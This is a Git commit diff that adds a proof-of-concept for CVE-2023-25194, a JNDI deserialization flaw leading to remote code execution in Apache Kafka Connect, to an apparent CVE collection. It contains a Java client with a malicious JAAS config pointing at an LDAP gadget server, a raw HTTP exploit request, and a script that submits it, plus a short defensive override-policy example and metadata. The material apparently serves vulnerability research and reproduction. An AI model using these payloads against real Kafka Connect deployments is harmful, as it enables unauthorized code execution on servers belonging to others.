!344 Add CVE-2023-25194

Merge pull request !344 from bihezhao/Feat_CVE_2023_25194
Re3et 2023-04-04 09:17:27 +00:00 committed by Gitee
commit d2d7fab740
5 changed files with 129 additions and 0 deletions

View File

@@ -0,0 +1,28 @@
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>CVE-2023-25194</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>

    <dependencies>
        <!-- Affected Kafka client: accepts JndiLoginModule in sasl.jaas.config -->
        <dependency>
            <groupId>org.apache.kafka</groupId>
            <artifactId>kafka-clients</artifactId>
            <version>3.3.0</version>
        </dependency>
        <!-- Deserialization gadget used by the CommonsBeanutils1 chain in the PoC -->
        <dependency>
            <groupId>commons-beanutils</groupId>
            <artifactId>commons-beanutils</artifactId>
            <version>1.9.4</version>
        </dependency>
    </dependencies>
</project>

View File

@@ -0,0 +1,25 @@
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.clients.producer.ProducerRecord;
import java.util.Properties;

public class Test {
    public static void main(String[] args) {
        Properties props = new Properties();
        // Use a SASL-based security protocol so the JAAS login module is evaluated.
        props.put("sasl.mechanism", "SCRAM-SHA-256");
        props.put("security.protocol", "SASL_SSL");
        // props.put("security.protocol","SASL_PLAINTEXT");
        // Malicious JAAS config: JndiLoginModule resolves user.provider.url via JNDI,
        // pointing the client at an attacker-controlled LDAP server.
        props.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule " +
                "required user.provider.url=\"ldap://127.0.0.1:1389/deserialCommonsBeanutils1\" " +
                "useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " +
                "group.provider.url=\"xxx\";");
        props.put("bootstrap.servers", "localhost:9092");
        props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
        // Constructing the producer initializes the SASL login module and fires the JNDI lookup.
        Producer<String, String> producer = new KafkaProducer<>(props);
    }
}

View File

@@ -0,0 +1,54 @@
## Description
A possible security vulnerability has been identified in Apache Kafka Connect. Exploitation requires access to a Kafka Connect worker and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. When configuring a connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to `com.sun.security.auth.module.JndiLoginModule` via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This makes the server connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute Java deserialization gadget chains on the Kafka Connect server. The attacker can thus cause unrestricted deserialization of untrusted data, or RCE, when gadgets are present in the classpath.

Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them.

Since Apache Kafka 3.4.0, a system property (`-Dorg.apache.kafka.disallowed.login.modules`) has been added to disable problematic login modules in SASL JAAS configuration, and `com.sun.security.auth.module.JndiLoginModule` is disabled by default in Apache Kafka 3.4.0. Kafka Connect users are advised to validate connector configurations and only allow trusted JNDI configurations, and to examine connector dependencies for vulnerable versions; remediation options include upgrading the connectors, upgrading the specific dependency, or removing the connectors. Finally, in addition to leveraging the `org.apache.kafka.disallowed.login.modules` system property, Kafka Connect users can also implement their own connector client config override policy, which controls which Kafka client properties can be overridden directly in a connector config and which cannot.
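
As an illustration of that last remediation option, the sketch below shows what a restrictive connector client config override policy could look like. It uses Kafka Connect's `ConnectorClientConfigOverridePolicy` SPI (KIP-458); the class name `RejectJndiOverridePolicy` and the specific rejection rule are illustrative assumptions, not part of this PoC.
```java
// Hypothetical policy sketch: rejects sasl.jaas.config overrides that reference JndiLoginModule.
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

import org.apache.kafka.common.config.ConfigValue;
import org.apache.kafka.connect.connector.policy.ConnectorClientConfigOverridePolicy;
import org.apache.kafka.connect.connector.policy.ConnectorClientConfigRequest;

public class RejectJndiOverridePolicy implements ConnectorClientConfigOverridePolicy {

    @Override
    public List<ConfigValue> validate(ConnectorClientConfigRequest request) {
        List<ConfigValue> results = new ArrayList<>();
        for (Map.Entry<String, Object> entry : request.clientProps().entrySet()) {
            ConfigValue result = new ConfigValue(entry.getKey());
            // Flag any JAAS override that names the JNDI login module.
            if (entry.getKey().endsWith("sasl.jaas.config")
                    && String.valueOf(entry.getValue()).contains("JndiLoginModule")) {
                result.addErrorMessage("JndiLoginModule is not allowed in connector client overrides");
            }
            results.add(result);
        }
        return results;
    }

    @Override
    public void configure(Map<String, ?> configs) {
        // No configuration needed for this sketch.
    }

    @Override
    public void close() {
        // Nothing to release.
    }
}
```
The worker would then reference such a class through its `connector.client.config.override.policy` setting (packaging and plugin registration details are deployment-specific and not covered here); on Kafka 3.4.0+, starting the worker with `-Dorg.apache.kafka.disallowed.login.modules=com.sun.security.auth.module.JndiLoginModule` achieves a similar effect without custom code.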
## PoC
```
POST /connectors HTTP/1.1
Host: xxxx:8083
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 1109
{"name": "test",
"config":
{
"connector.class":"io.debezium.connector.mysql.MySqlConnector",
"database.hostname": "xxxxx",
"database.port": "3306",
"database.user": "root",
"database.password": "xxxxxx",
"database.dbname": "xxxx",
"database.sslmode": "SSL_MODE",
"database.server.id": "1234",
"database.server.name": "localhost",
"table.include.list": "MYSQL_TABLES",
"tasks.max":"1",
"topic.prefix": "aaa22",
"debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
"schema.history.internal.kafka.topic": "aaa22",
"schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
"database.history.producer.security.protocol": "SASL_SSL",
"database.history.producer.sasl.mechanism": "PLAIN",
"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
}
}
```
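
Equivalently, the request can be submitted with a small Java 8-compatible client. This is only a convenience sketch: it assumes the JSON body above has been saved as `payload.json` and that the Connect REST API is reachable at `localhost:8083`; both values are placeholders.
```java
// Sends the connector-creation request above to the Kafka Connect REST API.
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Paths;

public class SubmitConnector {
    public static void main(String[] args) throws Exception {
        byte[] body = Files.readAllBytes(Paths.get("payload.json"));
        HttpURLConnection conn = (HttpURLConnection) new URL("http://localhost:8083/connectors").openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Content-Type", "application/json");
        conn.setDoOutput(true);
        try (OutputStream out = conn.getOutputStream()) {
            out.write(body);
        }
        // 201 Created means Kafka Connect accepted the connector config and will start the malicious producer.
        System.out.println("HTTP " + conn.getResponseCode());
    }
}
```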
## Attention
1. Import the required libraries by copying them into Kafka's `libs` directory.
2. Kafka Connect must be running (`./bin/connect-distributed.sh config/connect-distributed.properties`).
3. The MySQL connection info must be correct, and Kafka Connect must be able to reach the database.
## References
- https://github.com/ohnonoyesyes/CVE-2023-25194
- https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194

View File

@@ -0,0 +1,20 @@
id: CVE-2023-25194
source:
  https://github.com/ohnonoyesyes/CVE-2023-25194
info:
  name: Apache Kafka is a distributed event store and stream-processing platform. It is an open-source system developed by the Apache Software Foundation, written in Java and Scala.
  severity: high
  description: |
    A possible security vulnerability has been identified in Apache Kafka Connect. When gadgets are present in the classpath, an attacker can cause unrestricted deserialization of untrusted data, leading to an RCE vulnerability.
  scope-of-influence: Apache Kafka 2.3.0
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2023-25194
    - https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-25194
    cwe-id: CWE-502
    cnvd-id: None
    kve-id: None
  tags: deserialization of untrusted data

View File

@@ -14,6 +14,8 @@ cve:
  apache-Dubbo:
    - CVE-2021-43297
    - CVE-2021-25641
  apache-Kafka:
    - CVE-2023-25194
  apache-OFBiz:
    - CVE-2021-26295
  apache-Airflow: